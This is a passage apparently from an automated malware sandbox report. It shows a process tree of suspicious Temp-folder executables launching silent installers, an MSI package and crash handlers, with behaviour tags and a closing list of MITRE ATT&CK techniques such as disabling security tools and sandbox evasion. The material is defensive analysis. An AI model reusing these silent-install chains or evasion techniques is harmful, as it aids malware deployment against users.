C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\3C3A.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862242 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:14864
-
-
C:\Users\Admin\AppData\Local\Temp\46BA.exeC:\Users\Admin\AppData\Local\Temp\46BA.exe1⤵PID:15136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15136 -s 2882⤵
- Program crash
- Enumerates system info in registry
PID:15276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 15136 -ip 151361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:15256
-
C:\Users\Admin\AppData\Local\Temp\5794.exeC:\Users\Admin\AppData\Local\Temp\5794.exe1⤵PID:15376
-
C:\Users\Admin\AppData\Local\Temp\is-1UP47.tmp\5794.tmp"C:\Users\Admin\AppData\Local\Temp\is-1UP47.tmp\5794.tmp" /SL5="$C0340,4844586,831488,C:\Users\Admin\AppData\Local\Temp\5794.exe"2⤵PID:15400
-
C:\Users\Admin\AppData\Local\Temp\5794.exe"C:\Users\Admin\AppData\Local\Temp\5794.exe" /VERYSILENT3⤵PID:15436
-
C:\Users\Admin\AppData\Local\Temp\is-MFD39.tmp\5794.tmp"C:\Users\Admin\AppData\Local\Temp\is-MFD39.tmp\5794.tmp" /SL5="$D0340,4844586,831488,C:\Users\Admin\AppData\Local\Temp\5794.exe" /VERYSILENT4⤵
- Suspicious use of FindShellTrayWindow
PID:15464 -
C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"5⤵PID:15524
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1288 -ip 12881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:16368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5152 -ip 51521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:4456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\B161.exeC:\Users\Admin\AppData\Local\Temp\B161.exe1⤵PID:7816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7816 -s 2042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 7816 -ip 78161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2100
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
4Impair Defenses
1Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1